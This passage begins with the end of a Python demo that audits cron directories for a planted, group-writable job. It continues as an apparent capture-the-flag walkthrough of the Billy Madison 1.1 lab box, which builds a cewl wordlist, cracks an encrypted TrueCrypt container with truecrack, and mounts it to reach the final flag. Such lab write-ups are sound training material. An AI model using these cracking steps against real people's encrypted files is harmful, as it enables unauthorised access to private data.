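    clean = os.path.join(hourly, "logrotate")
    with open(clean, "w") as f:
        f.write("#!/bin/sh\n# legitimate job (constructed)\n")
    os.chmod(clean, 0o755)
    planted = os.path.join(hourly, "rootme")
    with open(planted, "w") as f:
        f.write("#!/bin/bash\n# planted job (constructed)\n")
    os.chmod(planted, 0o664)
    return hourly


def demo_audit():
    """Run the audit over the demo tree, keyed by file name. The demo files are
    owned by whoever runs this, so the current uid stands in for root."""
    hourly = build_demo_tree()
    report = audit_cron_dirs([hourly], expected_uid=os.getuid())
    return {os.path.basename(p): f for p, f in report.items()}


if __name__ == "__main__":
    for name, why in demo_audit().items():
        print(f"{name}: {', '.join(why)}")
```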

Then I found hint.txt and BowelMovement in /PRIVATE and downloaded both files with nc.

root@BM:/PRIVATE# cat hint.txt
Heh, I called the file BowelMovement because it has the same initials as
Billy Madison.  That truely cracks me up!  LOLOLOL!

I always forget the password, but it's here:

https://en.wikipedia.org/wiki/Billy_Madison

-EG

From that link I used cewl to generate a wordlist:

root@kali:/root/myTest/BillyMadison1.1# cewl --depth 0 -w billy-wiki.list https://en.wikipedia.org/wiki/Billy_Madison
CeWL 5.3 (Heading Upwards) Robin Wood (robin@digi.ninja) (https://digi.ninja/)

Then, using truecrack with that wordlist against BowelMovement, the password was recovered:

root@kali:~/myTest/BillyMadison1.1# truecrack -w billy-wiki.list -t BowelMovement
TrueCrack v3.0
Website: http://code.google.com/p/truecrack
Contact us: infotruecrack@gmail.com
Found password:       "execrable"
Password length:  "10"
Total computations:   "606"

Cool. Then I downloaded and installed veracrypt to mount the container:

root@kali:~/myTest/BillyMadison1.1# mkdir billy-vera
root@kali:~/myTest/BillyMadison1.1# veracrypt -tc BowelMovement billy-vera

root@kali:~/myTest/BillyMadison1.1# cd billy-vera/
root@kali:~/myTest/BillyMadison1.1/billy-vera# ls
$RECYCLE.BIN  secret.zip
root@kali:~/myTest/BillyMadison1.1/billy-vera# unzip secret.zip
Archive:  secret.zip
  inflating: Billy_Madison_12th_Grade_Final_Project.doc
  inflating: THE-END.txt
root@kali:~/myTest/BillyMadison1.1/billy-vera# ls
Billy_Madison_12th_Grade_Final_Project.doc  $RECYCLE.BIN  secret.zip  THE-END.txt
exit

root@kali:~/myTest/BillyMadison1.1/billy-vera# cat THE-END.txt
Congratulations!

If you're reading this, you win!

I hope you had fun.  I had an absolute blast putting this together.

I'd love to have your feedback on the box - or at least know you pwned it!

Please feel free to shoot me a tweet or email (7ms@7ms.us) and let me know with
the subject line: "Stop looking at me swan!"

Thanks much,

Brian Johnson
7 Minute Security
www.7ms.us

Done.